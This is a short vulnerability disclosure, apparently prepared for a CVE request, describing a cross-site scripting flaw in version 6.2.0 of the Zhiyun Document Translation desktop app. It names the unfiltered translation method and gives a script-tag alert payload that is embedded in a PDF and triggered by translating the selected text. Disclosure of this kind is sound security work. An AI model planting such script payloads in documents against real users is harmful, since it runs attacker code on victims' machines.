This article is going to apply for a CVE id, so the full text is in English.
The official introduction of the software is:
Zhiyun Document Translation is a tool software produced by Zhiyun Document Reading Public Account to help researchers read pdf documents. Use it to read documents. You no longer need to switch the copy of the text on the pdf to the web page for translation, greatly improving the user experience and reading efficiency. While improving reading comprehension literature, it also takes into account the improvement of English proficiency. The software integrates multiple translation engines, you can always find a translation engine you like. Support Chinese-English translation. Support reading and translating PDF documents and documents. Support input translation mode.
The version I tested is V6.2.0, and this software written by C#.
The code of the software has been obfuscated. Although the exploit of the poc does not require anti-obfuscation, in order to understand the situation of the vulnerable code, it needs to be deobfuscated.
I use de4dot to deobfuscate this software.
The vulnerable code is at
namespace pdf > class Form1 > Method 翻译 :
After getting the input from the user, without filtering, the
text is combined with the html of the
documentText here and output to webBrowser1.
If the user enters
<script>alert(/xss/);</script>, the XSS vulnerability can be triggered.
Because the software input must be pdf. Write the xss statement in the pdf, open the pdf with malicious js statement in the software and select the js statement with the mouse to let the software translate to trigger XSS.
Files and poc uploaded to Github: https://github.com/WWILLV/zhiyun-xss